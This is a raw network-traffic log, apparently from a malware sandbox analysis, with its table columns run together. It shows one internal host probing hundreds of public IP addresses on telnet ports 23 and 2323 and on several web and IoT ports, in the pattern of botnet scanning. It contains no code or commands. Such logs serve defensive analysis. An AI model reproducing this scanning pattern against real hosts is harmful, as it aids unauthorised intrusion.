                                                              Dec 11, 2024 00:43:06.287250996 CET1020023192.168.2.23172.172.187.164
                                                              Dec 11, 2024 00:43:06.287256002 CET1020023192.168.2.23190.163.22.162
                                                              Dec 11, 2024 00:43:06.287256002 CET1020023192.168.2.2354.128.129.251
                                                              Dec 11, 2024 00:43:06.287297010 CET1020023192.168.2.23150.158.108.82
                                                              Dec 11, 2024 00:43:06.287303925 CET1020023192.168.2.23120.33.124.24
                                                              Dec 11, 2024 00:43:06.287321091 CET1020023192.168.2.2366.31.229.103
                                                              Dec 11, 2024 00:43:06.287321091 CET1020023192.168.2.23166.8.8.107
                                                              Dec 11, 2024 00:43:06.287321091 CET1020023192.168.2.2389.23.108.106
                                                              Dec 11, 2024 00:43:06.287321091 CET1020023192.168.2.23112.168.18.90
                                                              Dec 11, 2024 00:43:06.287322998 CET1020023192.168.2.23206.56.111.55
                                                              Dec 11, 2024 00:43:06.287322998 CET102002323192.168.2.23141.129.165.140
                                                              Dec 11, 2024 00:43:06.287348032 CET1020023192.168.2.2399.17.154.195
                                                              Dec 11, 2024 00:43:06.287355900 CET1020023192.168.2.23169.149.244.160
                                                              Dec 11, 2024 00:43:06.287358999 CET1020023192.168.2.23122.71.227.209
                                                              Dec 11, 2024 00:43:06.287373066 CET1020023192.168.2.2378.200.3.59
                                                              Dec 11, 2024 00:43:06.287389994 CET1020023192.168.2.23151.65.170.208
                                                              Dec 11, 2024 00:43:06.287389994 CET1020023192.168.2.23202.98.3.56
                                                              Dec 11, 2024 00:43:06.287403107 CET1020023192.168.2.23110.249.100.129
                                                              Dec 11, 2024 00:43:06.287408113 CET1020023192.168.2.23177.40.56.131
                                                              Dec 11, 2024 00:43:06.287410975 CET1020023192.168.2.2338.38.1.17
                                                              Dec 11, 2024 00:43:06.287422895 CET102002323192.168.2.2320.211.127.177
                                                              Dec 11, 2024 00:43:06.287432909 CET1020023192.168.2.2345.244.41.173
                                                              Dec 11, 2024 00:43:06.287448883 CET1020023192.168.2.23176.10.45.47
                                                              Dec 11, 2024 00:43:06.287462950 CET1020023192.168.2.2344.134.42.176
                                                              Dec 11, 2024 00:43:06.287462950 CET1020023192.168.2.2320.13.211.69
                                                              Dec 11, 2024 00:43:06.287472963 CET1020023192.168.2.23168.19.117.253
                                                              Dec 11, 2024 00:43:06.287487984 CET1020023192.168.2.2335.75.141.188
                                                              Dec 11, 2024 00:43:06.287492037 CET1020023192.168.2.23161.223.25.47
                                                              Dec 11, 2024 00:43:06.287504911 CET1020023192.168.2.23116.80.70.194
                                                              Dec 11, 2024 00:43:06.287504911 CET1020023192.168.2.2335.143.230.122
                                                              Dec 11, 2024 00:43:06.320581913 CET597628080192.168.2.23170.13.70.64
                                                              Dec 11, 2024 00:43:06.320967913 CET4458881192.168.2.23118.114.118.190
                                                              Dec 11, 2024 00:43:06.321331978 CET482748080192.168.2.2365.224.38.249
                                                              Dec 11, 2024 00:43:06.321711063 CET466407574192.168.2.2334.136.79.41
                                                              Dec 11, 2024 00:43:06.322099924 CET4852280192.168.2.23178.51.3.128
                                                              Dec 11, 2024 00:43:06.322479010 CET3854080192.168.2.23202.152.121.18
                                                              Dec 11, 2024 00:43:06.322839022 CET4191280192.168.2.23152.158.234.19
                                                              Dec 11, 2024 00:43:06.323203087 CET4365837215192.168.2.23101.108.225.47
                                                              Dec 11, 2024 00:43:06.323585033 CET6029480192.168.2.23182.216.146.147
                                                              Dec 11, 2024 00:43:06.323966026 CET548368080192.168.2.23142.235.63.140
                                                              Dec 11, 2024 00:43:06.389702082 CET3567280192.168.2.2376.17.188.37
                                                              Dec 11, 2024 00:43:06.390069962 CET3316280192.168.2.236.218.88.254
                                                              Dec 11, 2024 00:43:06.390440941 CET415388080192.168.2.2315.157.152.64
                                                              Dec 11, 2024 00:43:06.390800953 CET4246437215192.168.2.23207.207.172.96
                                                              Dec 11, 2024 00:43:06.391166925 CET4249480192.168.2.23221.40.54.221
                                                              Dec 11, 2024 00:43:06.391535044 CET3625837215192.168.2.23170.243.90.64
                                                              Dec 11, 2024 00:43:06.391891956 CET562368443192.168.2.23131.43.106.19
                                                              Dec 11, 2024 00:43:06.392137051 CET5048480192.168.2.2391.32.136.60
                                                              Dec 11, 2024 00:43:06.392582893 CET5347680192.168.2.2371.213.59.190
                                                              Dec 11, 2024 00:43:06.393013000 CET6099280192.168.2.23149.197.49.203
                                                              Dec 11, 2024 00:43:06.393476009 CET6009080192.168.2.2354.126.187.157
                                                              Dec 11, 2024 00:43:06.405517101 CET231020032.136.89.18192.168.2.23
                                                              Dec 11, 2024 00:43:06.405571938 CET102310200108.31.129.249192.168.2.23
                                                              Dec 11, 2024 00:43:06.405571938 CET1020023192.168.2.2332.136.89.18
                                                              Dec 11, 2024 00:43:06.405581951 CET2310200141.187.96.40192.168.2.23
                                                              Dec 11, 2024 00:43:06.405596018 CET231020086.81.218.163192.168.2.23
                                                              Dec 11, 2024 00:43:06.405611992 CET2310200158.85.9.10192.168.2.23
                                                              Dec 11, 2024 00:43:06.405613899 CET1020023192.168.2.23141.187.96.40
                                                              Dec 11, 2024 00:43:06.405631065 CET102001023192.168.2.23108.31.129.249
                                                              Dec 11, 2024 00:43:06.405632019 CET1020023192.168.2.2386.81.218.163
                                                              Dec 11, 2024 00:43:06.405704021 CET2310200155.104.100.239192.168.2.23
                                                              Dec 11, 2024 00:43:06.405714035 CET2310200149.229.193.70192.168.2.23
                                                              Dec 11, 2024 00:43:06.405721903 CET2310200194.52.51.238192.168.2.23
                                                              Dec 11, 2024 00:43:06.405740976 CET23102009.30.219.52192.168.2.23
                                                              Dec 11, 2024 00:43:06.405746937 CET1020023192.168.2.23155.104.100.239
                                                              Dec 11, 2024 00:43:06.405747890 CET1020023192.168.2.23149.229.193.70
                                                              Dec 11, 2024 00:43:06.405750990 CET232310200209.2.90.250192.168.2.23
                                                              Dec 11, 2024 00:43:06.405754089 CET1020023192.168.2.23194.52.51.238
                                                              Dec 11, 2024 00:43:06.405761957 CET231020079.79.246.71192.168.2.23
                                                              Dec 11, 2024 00:43:06.405777931 CET1020023192.168.2.239.30.219.52
                                                              Dec 11, 2024 00:43:06.405777931 CET1020023192.168.2.23158.85.9.10
                                                              Dec 11, 2024 00:43:06.405777931 CET102002323192.168.2.23209.2.90.250
                                                              Dec 11, 2024 00:43:06.405798912 CET1020023192.168.2.2379.79.246.71
                                                              Dec 11, 2024 00:43:06.406430960 CET2310200220.237.5.20192.168.2.23
                                                              Dec 11, 2024 00:43:06.406444073 CET2310200124.85.123.22192.168.2.23
                                                              Dec 11, 2024 00:43:06.406471014 CET1020023192.168.2.23220.237.5.20
                                                              Dec 11, 2024 00:43:06.406474113 CET1020023192.168.2.23124.85.123.22
                                                              Dec 11, 2024 00:43:06.406503916 CET2310200126.201.85.241192.168.2.23
                                                              Dec 11, 2024 00:43:06.406513929 CET2310200145.212.247.248192.168.2.23
                                                              Dec 11, 2024 00:43:06.406536102 CET1020023192.168.2.23126.201.85.241
                                                              Dec 11, 2024 00:43:06.406541109 CET1020023192.168.2.23145.212.247.248
                                                              Dec 11, 2024 00:43:06.406626940 CET231020059.61.38.83192.168.2.23
                                                              Dec 11, 2024 00:43:06.406637907 CET2310200139.245.15.124192.168.2.23
                                                              Dec 11, 2024 00:43:06.406646013 CET2310200175.250.46.42192.168.2.23
                                                              Dec 11, 2024 00:43:06.406655073 CET2310200216.79.143.146192.168.2.23
                                                              Dec 11, 2024 00:43:06.406662941 CET232310200115.197.144.134192.168.2.23
                                                              Dec 11, 2024 00:43:06.406670094 CET2310200149.74.37.36192.168.2.23
                                                              Dec 11, 2024 00:43:06.406672955 CET1020023192.168.2.2359.61.38.83
                                                              Dec 11, 2024 00:43:06.406677008 CET1020023192.168.2.23139.245.15.124
                                                              Dec 11, 2024 00:43:06.406677961 CET2310200202.180.20.162192.168.2.23
                                                              Dec 11, 2024 00:43:06.406683922 CET1020023192.168.2.23175.250.46.42
                                                              Dec 11, 2024 00:43:06.406687021 CET231020082.113.16.129192.168.2.23
                                                              Dec 11, 2024 00:43:06.406687975 CET1020023192.168.2.23216.79.143.146
                                                              Dec 11, 2024 00:43:06.406691074 CET102002323192.168.2.23115.197.144.134
                                                              Dec 11, 2024 00:43:06.406697035 CET2310200172.33.230.174192.168.2.23
                                                              Dec 11, 2024 00:43:06.406698942 CET1020023192.168.2.23149.74.37.36
                                                              Dec 11, 2024 00:43:06.406706095 CET1020023192.168.2.23202.180.20.162
                                                              Dec 11, 2024 00:43:06.406706095 CET231020014.237.76.100192.168.2.23
                                                              Dec 11, 2024 00:43:06.406711102 CET1020023192.168.2.2382.113.16.129
                                                              Dec 11, 2024 00:43:06.406714916 CET231020096.220.250.158192.168.2.23
                                                              Dec 11, 2024 00:43:06.406723022 CET2310200172.57.131.195192.168.2.23
                                                              Dec 11, 2024 00:43:06.406730890 CET1020023192.168.2.23172.33.230.174
                                                              Dec 11, 2024 00:43:06.406734943 CET1020023192.168.2.2314.237.76.100
                                                              Dec 11, 2024 00:43:06.406742096 CET2310200115.95.155.249192.168.2.23
                                                              Dec 11, 2024 00:43:06.406744957 CET1020023192.168.2.2396.220.250.158
                                                              Dec 11, 2024 00:43:06.406750917 CET23231020012.81.120.203192.168.2.23
                                                              Dec 11, 2024 00:43:06.406753063 CET1020023192.168.2.23172.57.131.195
                                                              Dec 11, 2024 00:43:06.406754971 CET2310200198.120.198.34192.168.2.23
                                                              Dec 11, 2024 00:43:06.406764984 CET2310200112.23.216.106192.168.2.23
                                                              Dec 11, 2024 00:43:06.406773090 CET23102002.4.82.76192.168.2.23
                                                              Dec 11, 2024 00:43:06.406780958 CET1020023192.168.2.23115.95.155.249
                                                              Dec 11, 2024 00:43:06.406780958 CET102002323192.168.2.2312.81.120.203
                                                              Dec 11, 2024 00:43:06.406781912 CET231020037.211.231.215192.168.2.23
                                                              Dec 11, 2024 00:43:06.406783104 CET1020023192.168.2.23198.120.198.34
                                                              Dec 11, 2024 00:43:06.406790972 CET231020095.236.149.16192.168.2.23
                                                              Dec 11, 2024 00:43:06.406799078 CET2310200122.21.99.245192.168.2.23
                                                              Dec 11, 2024 00:43:06.406800985 CET1020023192.168.2.23112.23.216.106
                                                              Dec 11, 2024 00:43:06.406805038 CET1020023192.168.2.232.4.82.76
                                                              Dec 11, 2024 00:43:06.406806946 CET231020032.151.75.226192.168.2.23
                                                              Dec 11, 2024 00:43:06.406816006 CET1020023192.168.2.2337.211.231.215
                                                              Dec 11, 2024 00:43:06.406816959 CET231020085.171.128.88192.168.2.23
                                                              Dec 11, 2024 00:43:06.406820059 CET1020023192.168.2.2395.236.149.16
                                                              Dec 11, 2024 00:43:06.406825066 CET1020023192.168.2.23122.21.99.245
                                                              Dec 11, 2024 00:43:06.406831980 CET1020023192.168.2.2332.151.75.226
                                                              Dec 11, 2024 00:43:06.406846046 CET231020044.143.201.111192.168.2.23
                                                              Dec 11, 2024 00:43:06.406869888 CET1020023192.168.2.2385.171.128.88
                                                              Dec 11, 2024 00:43:06.406869888 CET1020023192.168.2.2344.143.201.111
                                                              Dec 11, 2024 00:43:06.407166004 CET231020043.229.130.178192.168.2.23
                                                              Dec 11, 2024 00:43:06.407175064 CET2323102002.181.158.209192.168.2.23
                                                              Dec 11, 2024 00:43:06.407195091 CET102002323192.168.2.232.181.158.209
                                                              Dec 11, 2024 00:43:06.407196045 CET1020023192.168.2.2343.229.130.178
                                                              Dec 11, 2024 00:43:06.407233953 CET2310200100.193.231.97192.168.2.23
                                                              Dec 11, 2024 00:43:06.407243967 CET231020017.28.193.216192.168.2.23
                                                              Dec 11, 2024 00:43:06.407253981 CET2310200126.134.88.109192.168.2.23
                                                              Dec 11, 2024 00:43:06.407274008 CET1020023192.168.2.2317.28.193.216
                                                              Dec 11, 2024 00:43:06.407274961 CET1020023192.168.2.23100.193.231.97
                                                              Dec 11, 2024 00:43:06.407289982 CET1020023192.168.2.23126.134.88.109
                                                              Dec 11, 2024 00:43:06.407293081 CET2310200158.76.253.38192.168.2.23
                                                              Dec 11, 2024 00:43:06.407334089 CET1020023192.168.2.23158.76.253.38
                                                              Dec 11, 2024 00:43:06.407351971 CET231020071.69.33.211192.168.2.23
                                                              Dec 11, 2024 00:43:06.407361031 CET2310200185.18.224.139192.168.2.23
                                                              Dec 11, 2024 00:43:06.407366037 CET2310200166.245.56.0192.168.2.23
                                                              Dec 11, 2024 00:43:06.407380104 CET231020086.52.242.188192.168.2.23
                                                              Dec 11, 2024 00:43:06.407399893 CET1020023192.168.2.23185.18.224.139
                                                              Dec 11, 2024 00:43:06.407399893 CET1020023192.168.2.2371.69.33.211
                                                              Dec 11, 2024 00:43:06.407407999 CET1020023192.168.2.2386.52.242.188
                                                              Dec 11, 2024 00:43:06.407411098 CET1020023192.168.2.23166.245.56.0
                                                              Dec 11, 2024 00:43:06.407433987 CET2310200108.108.252.186192.168.2.23
                                                              Dec 11, 2024 00:43:06.407444954 CET232310200159.47.201.145192.168.2.23
                                                              Dec 11, 2024 00:43:06.407468081 CET1020023192.168.2.23108.108.252.186
                                                              Dec 11, 2024 00:43:06.407473087 CET102002323192.168.2.23159.47.201.145
                                                              Dec 11, 2024 00:43:06.407536983 CET23102004.99.173.231192.168.2.23
                                                              Dec 11, 2024 00:43:06.407546997 CET231020043.78.210.27192.168.2.23
                                                              Dec 11, 2024 00:43:06.407551050 CET2310200145.41.166.5192.168.2.23
                                                              Dec 11, 2024 00:43:06.407558918 CET231020034.99.158.179192.168.2.23
                                                              Dec 11, 2024 00:43:06.407577038 CET231020041.145.125.108192.168.2.23
                                                              Dec 11, 2024 00:43:06.407582045 CET1020023192.168.2.234.99.173.231
                                                              Dec 11, 2024 00:43:06.407583952 CET1020023192.168.2.2343.78.210.27
                                                              Dec 11, 2024 00:43:06.407583952 CET1020023192.168.2.23145.41.166.5
                                                              Dec 11, 2024 00:43:06.407586098 CET2310200217.93.174.227192.168.2.23
                                                              Dec 11, 2024 00:43:06.407589912 CET1020023192.168.2.2334.99.158.179
                                                              Dec 11, 2024 00:43:06.407598019 CET2310200193.209.75.106192.168.2.23
                                                              Dec 11, 2024 00:43:06.407607079 CET231020074.54.152.4192.168.2.23
                                                              Dec 11, 2024 00:43:06.407608032 CET1020023192.168.2.2341.145.125.108
                                                              Dec 11, 2024 00:43:06.407618046 CET1020023192.168.2.23217.93.174.227
                                                              Dec 11, 2024 00:43:06.407634020 CET1020023192.168.2.2374.54.152.4
                                                              Dec 11, 2024 00:43:06.407638073 CET1020023192.168.2.23193.209.75.106
                                                              Dec 11, 2024 00:43:06.407718897 CET2310200209.77.72.37192.168.2.23
                                                              Dec 11, 2024 00:43:06.407727957 CET232310200152.87.185.58192.168.2.23
                                                              Dec 11, 2024 00:43:06.407737017 CET2310200174.42.5.134192.168.2.23
                                                              Dec 11, 2024 00:43:06.407741070 CET23102002.155.228.254192.168.2.23
                                                              Dec 11, 2024 00:43:06.407746077 CET231020087.246.207.109192.168.2.23
                                                              Dec 11, 2024 00:43:06.407747030 CET1020023192.168.2.23209.77.72.37
                                                              Dec 11, 2024 00:43:06.407754898 CET2310200103.88.13.215192.168.2.23
                                                              Dec 11, 2024 00:43:06.407757998 CET102002323192.168.2.23152.87.185.58
                                                              Dec 11, 2024 00:43:06.407763958 CET231020077.133.61.167192.168.2.23
                                                              Dec 11, 2024 00:43:06.407766104 CET1020023192.168.2.23174.42.5.134
                                                              Dec 11, 2024 00:43:06.407768011 CET1020023192.168.2.2387.246.207.109
                                                              Dec 11, 2024 00:43:06.407769918 CET1020023192.168.2.232.155.228.254
                                                              Dec 11, 2024 00:43:06.407783031 CET1020023192.168.2.23103.88.13.215
                                                              Dec 11, 2024 00:43:06.407804012 CET1020023192.168.2.2377.133.61.167
                                                              Dec 11, 2024 00:43:06.408205986 CET2310200187.49.251.204192.168.2.23
                                                              Dec 11, 2024 00:43:06.408237934 CET1020023192.168.2.23187.49.251.204
                                                              Dec 11, 2024 00:43:06.408247948 CET231020068.248.194.236192.168.2.23
                                                              Dec 11, 2024 00:43:06.408282042 CET1020023192.168.2.2368.248.194.236
                                                              Dec 11, 2024 00:43:06.408297062 CET23102009.57.90.30192.168.2.23
                                                              Dec 11, 2024 00:43:06.408305883 CET2310200195.107.216.178192.168.2.23
                                                              Dec 11, 2024 00:43:06.408313990 CET23231020024.215.67.187192.168.2.23
                                                              Dec 11, 2024 00:43:06.408330917 CET1020023192.168.2.239.57.90.30
                                                              Dec 11, 2024 00:43:06.408335924 CET231020037.186.16.158192.168.2.23
                                                              Dec 11, 2024 00:43:06.408340931 CET1020023192.168.2.23195.107.216.178
                                                              Dec 11, 2024 00:43:06.408344984 CET102002323192.168.2.2324.215.67.187
                                                              Dec 11, 2024 00:43:06.408346891 CET231020066.173.2.190192.168.2.23
                                                              Dec 11, 2024 00:43:06.408374071 CET1020023192.168.2.2337.186.16.158
                                                              Dec 11, 2024 00:43:06.408375025 CET1020023192.168.2.2366.173.2.190
                                                              Dec 11, 2024 00:43:06.408390999 CET2310200105.187.205.137192.168.2.23
                                                              Dec 11, 2024 00:43:06.408430099 CET1020023192.168.2.23105.187.205.137
                                                              Dec 11, 2024 00:43:06.408440113 CET231020067.35.127.87192.168.2.23
                                                              Dec 11, 2024 00:43:06.408449888 CET231020099.227.25.15192.168.2.23
                                                              Dec 11, 2024 00:43:06.408473969 CET2310200135.67.112.240192.168.2.23
                                                              Dec 11, 2024 00:43:06.408473969 CET1020023192.168.2.2367.35.127.87
                                                              Dec 11, 2024 00:43:06.408473969 CET1020023192.168.2.2399.227.25.15
                                                              Dec 11, 2024 00:43:06.408483982 CET2310200208.160.54.131192.168.2.23
                                                              Dec 11, 2024 00:43:06.408504963 CET1020023192.168.2.23135.67.112.240
                                                              Dec 11, 2024 00:43:06.408519030 CET1020023192.168.2.23208.160.54.131
                                                              Dec 11, 2024 00:43:06.408530951 CET2310200131.251.164.119192.168.2.23
                                                              Dec 11, 2024 00:43:06.408540010 CET2310200151.107.62.160192.168.2.23
                                                              Dec 11, 2024 00:43:06.408555031 CET1020023192.168.2.23131.251.164.119
                                                              Dec 11, 2024 00:43:06.408571005 CET1020023192.168.2.23151.107.62.160
                                                              Dec 11, 2024 00:43:06.408580065 CET232310200210.154.24.34192.168.2.23
                                                              Dec 11, 2024 00:43:06.408591032 CET231020047.7.156.48192.168.2.23
                                                              Dec 11, 2024 00:43:06.408601046 CET231020088.122.142.238192.168.2.23
                                                              Dec 11, 2024 00:43:06.408602953 CET102002323192.168.2.23210.154.24.34
                                                              Dec 11, 2024 00:43:06.408622026 CET1020023192.168.2.2347.7.156.48
                                                              Dec 11, 2024 00:43:06.408622980 CET231020088.30.18.230192.168.2.23
                                                              Dec 11, 2024 00:43:06.408627987 CET1020023192.168.2.2388.122.142.238
                                                              Dec 11, 2024 00:43:06.408633947 CET2310200120.48.139.251192.168.2.23
                                                              Dec 11, 2024 00:43:06.408664942 CET1020023192.168.2.2388.30.18.230
                                                              Dec 11, 2024 00:43:06.408665895 CET1020023192.168.2.23120.48.139.251
                                                              Dec 11, 2024 00:43:06.408761024 CET231020014.58.2.115192.168.2.23
                                                              Dec 11, 2024 00:43:06.408770084 CET231020080.231.28.242192.168.2.23
                                                              Dec 11, 2024 00:43:06.408777952 CET231020088.10.188.53192.168.2.23
                                                              Dec 11, 2024 00:43:06.408787012 CET2310200179.94.20.225192.168.2.23
                                                              Dec 11, 2024 00:43:06.408793926 CET1020023192.168.2.2314.58.2.115
                                                              Dec 11, 2024 00:43:06.408795118 CET231020040.4.213.237192.168.2.23
                                                              Dec 11, 2024 00:43:06.408802032 CET1020023192.168.2.2380.231.28.242
                                                              Dec 11, 2024 00:43:06.408806086 CET232310200192.20.148.98192.168.2.23
                                                              Dec 11, 2024 00:43:06.408813000 CET1020023192.168.2.23179.94.20.225
                                                              Dec 11, 2024 00:43:06.408813953 CET231020044.186.123.84192.168.2.23
                                                              Dec 11, 2024 00:43:06.408814907 CET1020023192.168.2.2388.10.188.53
                                                              Dec 11, 2024 00:43:06.408823967 CET1020023192.168.2.2340.4.213.237
                                                              Dec 11, 2024 00:43:06.408823967 CET2310200172.226.89.71192.168.2.23
                                                              Dec 11, 2024 00:43:06.408834934 CET231020023.127.59.141192.168.2.23
                                                              Dec 11, 2024 00:43:06.408844948 CET1020023192.168.2.2344.186.123.84
                                                              Dec 11, 2024 00:43:06.408849955 CET102002323192.168.2.23192.20.148.98
                                                              Dec 11, 2024 00:43:06.408865929 CET1020023192.168.2.23172.226.89.71
                                                              Dec 11, 2024 00:43:06.408873081 CET1020023192.168.2.2323.127.59.141
                                                              Dec 11, 2024 00:43:06.409297943 CET2310200130.29.74.31192.168.2.23
                                                              Dec 11, 2024 00:43:06.409317017 CET2310200110.38.67.182192.168.2.23
                                                              Dec 11, 2024 00:43:06.409326077 CET231020047.57.169.1192.168.2.23
                                                              Dec 11, 2024 00:43:06.409332037 CET1020023192.168.2.23130.29.74.31
                                                              Dec 11, 2024 00:43:06.409348965 CET1020023192.168.2.2347.57.169.1
                                                              Dec 11, 2024 00:43:06.409353971 CET1020023192.168.2.23110.38.67.182
                                                              Dec 11, 2024 00:43:06.409373045 CET2310200208.119.213.181192.168.2.23
                                                              Dec 11, 2024 00:43:06.409382105 CET231020031.165.139.117192.168.2.23
                                                              Dec 11, 2024 00:43:06.409401894 CET231020088.82.96.181192.168.2.23
                                                              Dec 11, 2024 00:43:06.409406900 CET1020023192.168.2.23208.119.213.181
                                                              Dec 11, 2024 00:43:06.409408092 CET1020023192.168.2.2331.165.139.117
                                                              Dec 11, 2024 00:43:06.409439087 CET1020023192.168.2.2388.82.96.181
                                                              Dec 11, 2024 00:43:06.409461021 CET232310200222.173.140.56192.168.2.23
                                                              Dec 11, 2024 00:43:06.409491062 CET102002323192.168.2.23222.173.140.56
                                                              Dec 11, 2024 00:43:06.409522057 CET231020041.26.32.79192.168.2.23
                                                              Dec 11, 2024 00:43:06.409533024 CET2310200206.39.112.211192.168.2.23
                                                              Dec 11, 2024 00:43:06.409555912 CET1020023192.168.2.2341.26.32.79
                                                              Dec 11, 2024 00:43:06.409564972 CET231020018.46.16.87192.168.2.23
                                                              Dec 11, 2024 00:43:06.409569979 CET1020023192.168.2.23206.39.112.211
                                                              Dec 11, 2024 00:43:06.409583092 CET2310200221.165.177.22192.168.2.23
                                                              Dec 11, 2024 00:43:06.409599066 CET1020023192.168.2.2318.46.16.87
                                                              Dec 11, 2024 00:43:06.409614086 CET1020023192.168.2.23221.165.177.22
                                                              Dec 11, 2024 00:43:06.409621954 CET2310200211.7.79.105192.168.2.23
                                                              Dec 11, 2024 00:43:06.409657001 CET1020023192.168.2.23211.7.79.105
                                                              Dec 11, 2024 00:43:06.409684896 CET2310200207.75.200.150192.168.2.23
                                                              Dec 11, 2024 00:43:06.409694910 CET2310200118.85.54.159192.168.2.23
                                                              Dec 11, 2024 00:43:06.409706116 CET2310200177.207.39.112192.168.2.23
                                                              Dec 11, 2024 00:43:06.409723997 CET1020023192.168.2.23207.75.200.150
                                                              Dec 11, 2024 00:43:06.409723997 CET1020023192.168.2.23118.85.54.159
                                                              Dec 11, 2024 00:43:06.409734964 CET1020023192.168.2.23177.207.39.112
                                                              Dec 11, 2024 00:43:06.409749031 CET2310200152.137.103.62192.168.2.23
                                                              Dec 11, 2024 00:43:06.409766912 CET232310200208.199.224.144192.168.2.23
                                                              Dec 11, 2024 00:43:06.409775019 CET1020023192.168.2.23152.137.103.62
                                                              Dec 11, 2024 00:43:06.409806967 CET102002323192.168.2.23208.199.224.144
                                                              Dec 11, 2024 00:43:06.409820080 CET23102008.129.186.47192.168.2.23
                                                              Dec 11, 2024 00:43:06.409830093 CET2310200118.237.113.193192.168.2.23
                                                              Dec 11, 2024 00:43:06.409857988 CET1020023192.168.2.238.129.186.47
                                                              Dec 11, 2024 00:43:06.409859896 CET1020023192.168.2.23118.237.113.193
                                                              Dec 11, 2024 00:43:06.410013914 CET231020040.150.42.136192.168.2.23
                                                              Dec 11, 2024 00:43:06.410023928 CET2310200193.69.43.90192.168.2.23
                                                              Dec 11, 2024 00:43:06.410032988 CET2310200187.185.63.234192.168.2.23
                                                              Dec 11, 2024 00:43:06.410037041 CET231020057.123.82.224192.168.2.23
                                                              Dec 11, 2024 00:43:06.410044909 CET2310200202.179.63.202192.168.2.23
                                                              Dec 11, 2024 00:43:06.410048008 CET1020023192.168.2.2340.150.42.136
                                                              Dec 11, 2024 00:43:06.410054922 CET23102002.219.136.241192.168.2.23
                                                              Dec 11, 2024 00:43:06.410063982 CET231020066.118.44.228192.168.2.23
                                                              Dec 11, 2024 00:43:06.410064936 CET1020023192.168.2.23193.69.43.90
                                                              Dec 11, 2024 00:43:06.410070896 CET1020023192.168.2.23187.185.63.234
                                                              Dec 11, 2024 00:43:06.410073042 CET23231020073.60.79.97192.168.2.23
                                                              Dec 11, 2024 00:43:06.410073042 CET1020023192.168.2.2357.123.82.224
                                                              Dec 11, 2024 00:43:06.410075903 CET1020023192.168.2.23202.179.63.202
                                                              Dec 11, 2024 00:43:06.410077095 CET1020023192.168.2.232.219.136.241
                                                              Dec 11, 2024 00:43:06.410084009 CET2310200119.70.174.234192.168.2.23
                                                              Dec 11, 2024 00:43:06.410100937 CET1020023192.168.2.2366.118.44.228
                                                              Dec 11, 2024 00:43:06.410114050 CET1020023192.168.2.23119.70.174.234
                                                              Dec 11, 2024 00:43:06.410115004 CET102002323192.168.2.2373.60.79.97
                                                              Dec 11, 2024 00:43:06.410438061 CET231020088.202.254.49192.168.2.23
                                                              Dec 11, 2024 00:43:06.410448074 CET2310200187.119.204.29192.168.2.23
                                                              Dec 11, 2024 00:43:06.410458088 CET102310200176.0.3.121192.168.2.23
                                                              Dec 11, 2024 00:43:06.410473108 CET1020023192.168.2.2388.202.254.49
                                                              Dec 11, 2024 00:43:06.410475969 CET1020023192.168.2.23187.119.204.29
                                                              Dec 11, 2024 00:43:06.410489082 CET102001023192.168.2.23176.0.3.121
                                                              Dec 11, 2024 00:43:06.410505056 CET2310200221.163.113.40192.168.2.23
                                                              Dec 11, 2024 00:43:06.410533905 CET2310200141.212.111.152192.168.2.23
                                                              Dec 11, 2024 00:43:06.410542965 CET231020040.172.188.30192.168.2.23
                                                              Dec 11, 2024 00:43:06.410543919 CET1020023192.168.2.23221.163.113.40
                                                              Dec 11, 2024 00:43:06.410563946 CET1020023192.168.2.23141.212.111.152
                                                              Dec 11, 2024 00:43:06.410576105 CET1020023192.168.2.2340.172.188.30
                                                              Dec 11, 2024 00:43:06.410643101 CET232310200122.154.248.225192.168.2.23
                                                              Dec 11, 2024 00:43:06.410653114 CET2310200172.172.187.164192.168.2.23
                                                              Dec 11, 2024 00:43:06.410660982 CET2310200190.163.22.162192.168.2.23
                                                              Dec 11, 2024 00:43:06.410669088 CET231020054.128.129.251192.168.2.23
                                                              Dec 11, 2024 00:43:06.410679102 CET2310200150.158.108.82192.168.2.23
                                                              Dec 11, 2024 00:43:06.410681963 CET1020023192.168.2.23172.172.187.164
                                                              Dec 11, 2024 00:43:06.410686970 CET102002323192.168.2.23122.154.248.225
                                                              Dec 11, 2024 00:43:06.410687923 CET2310200120.33.124.24192.168.2.23
                                                              Dec 11, 2024 00:43:06.410691977 CET1020023192.168.2.23190.163.22.162
                                                              Dec 11, 2024 00:43:06.410691977 CET1020023192.168.2.2354.128.129.251
                                                              Dec 11, 2024 00:43:06.410707951 CET1020023192.168.2.23150.158.108.82
                                                              Dec 11, 2024 00:43:06.410711050 CET1020023192.168.2.23120.33.124.24
                                                              Dec 11, 2024 00:43:06.410713911 CET2310200206.56.111.55192.168.2.23
                                                              Dec 11, 2024 00:43:06.410723925 CET231020066.31.229.103192.168.2.23
                                                              Dec 11, 2024 00:43:06.410748005 CET1020023192.168.2.23206.56.111.55
                                                              Dec 11, 2024 00:43:06.410753012 CET1020023192.168.2.2366.31.229.103
                                                              Dec 11, 2024 00:43:06.410782099 CET2310200166.8.8.107192.168.2.23
                                                              Dec 11, 2024 00:43:06.410789967 CET231020089.23.108.106192.168.2.23
                                                              Dec 11, 2024 00:43:06.410799980 CET2310200112.168.18.90192.168.2.23
                                                              Dec 11, 2024 00:43:06.410824060 CET1020023192.168.2.23166.8.8.107
                                                              Dec 11, 2024 00:43:06.410824060 CET1020023192.168.2.2389.23.108.106
                                                              Dec 11, 2024 00:43:06.410824060 CET1020023192.168.2.23112.168.18.90
                                                              Dec 11, 2024 00:43:06.410834074 CET232310200141.129.165.140192.168.2.23
                                                              Dec 11, 2024 00:43:06.410844088 CET231020099.17.154.195192.168.2.23
                                                              Dec 11, 2024 00:43:06.410856009 CET2310200169.149.244.160192.168.2.23
                                                              Dec 11, 2024 00:43:06.410871029 CET102002323192.168.2.23141.129.165.140
                                                              Dec 11, 2024 00:43:06.410871029 CET1020023192.168.2.2399.17.154.195
                                                              Dec 11, 2024 00:43:06.410881996 CET1020023192.168.2.23169.149.244.160
                                                              Dec 11, 2024 00:43:06.410944939 CET2310200122.71.227.209192.168.2.23
                                                              Dec 11, 2024 00:43:06.410954952 CET231020078.200.3.59192.168.2.23
                                                              Dec 11, 2024 00:43:06.410963058 CET2310200202.98.3.56192.168.2.23
                                                              Dec 11, 2024 00:43:06.410970926 CET2310200151.65.170.208192.168.2.23
                                                              Dec 11, 2024 00:43:06.410981894 CET2310200110.249.100.129192.168.2.23
                                                              Dec 11, 2024 00:43:06.410985947 CET1020023192.168.2.23122.71.227.209
                                                              Dec 11, 2024 00:43:06.410986900 CET1020023192.168.2.2378.200.3.59
                                                              Dec 11, 2024 00:43:06.410988092 CET1020023192.168.2.23202.98.3.56
                                                              Dec 11, 2024 00:43:06.410990000 CET2310200177.40.56.131192.168.2.23
